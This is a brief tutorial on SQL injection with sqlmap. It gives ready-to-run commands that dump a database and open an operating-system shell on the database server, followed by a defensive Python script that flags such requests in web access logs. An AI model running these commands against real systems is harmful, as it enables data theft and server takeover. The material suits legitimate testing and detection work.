SQL Injection Tools

Database Dump using SQLmap

SQLmap is a popular tool for validating a SQL injection vulnerability and exploiting it. The tool checks for various flaws, such as the ones mentioned in the previous sections, before presenting the option to exploit them.

sqlmap -u "http://192.168.1.1/pricelist.php?id=1" -p "id" --dbms=mysql --dump

Two important parameters are passed to the command:

  • -p - the parameter that can be exploited for SQL injection

  • --dbms - the type of database

The above command dumps all the information from the database.

Remote Shell Through SQLmap

It is possible to exploit the remote shell vulnerability a database might possess through SQLmap using the following command:

sqlmap -u http://192.168.1.1/pricelist.php?id=1 -p "id" --dbms=mysql --os-shell
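Both commands above send their test requests through the "id" parameter of pricelist.php, so they can be spotted in the web server's access log. The following is an added example, not part of the original page: it flags such requests, assuming the combined log format and that "id" is normally a plain integer. The function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /pricelist.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /pricelist.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-constructed (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /pricelist.php?id=1%27 HTTP/1.1" 500 90 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# client IP, method, request target, User-Agent
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"'
)

def suspicious_requests(log_text, path="/pricelist.php", param="id"):
    """Return (client_ip, reasons) for requests that look like injection testing."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, _method, target, agent = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        reasons = []
        # sqlmap announces itself by default; the header can be changed,
        # so this check alone is not sufficient.
        if agent.lower().startswith("sqlmap/"):
            reasons.append("sqlmap user-agent")
        # parse_qs percent-decodes the value before it is checked.
        # Assumption: a legitimate id is decimal digits only.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        if any(not re.fullmatch(r"[0-9]+", v) for v in values):
            reasons.append("non-integer id")
        if reasons:
            findings.append((ip, reasons))
    return findings

if __name__ == "__main__":
    for ip, reasons in suspicious_requests(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```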
